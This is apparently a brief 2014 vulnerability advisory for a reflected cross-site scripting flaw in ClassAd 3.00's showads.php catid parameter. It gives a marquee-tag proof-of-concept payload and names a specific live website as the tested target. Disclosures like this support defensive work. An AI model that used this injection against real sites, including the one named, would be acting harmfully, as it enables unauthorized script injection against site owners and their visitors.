# Cross Site Scripting on ClassAd
# Risk: Low
# CWE number: CWE-79
# Date: 19/05/2014
# Vendor: projects-and-software.de
# Version:3.00
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: showads.php
# Exploit: http:/host/path/showads.php?catid=[xss]
# PoC:
[-]Target: http://petroman.de
[-]Vuln. File: /steckbrief/showads.php?catid=
[-]Exploit: "><marquee>Vulnerable</marquee>
# Thank's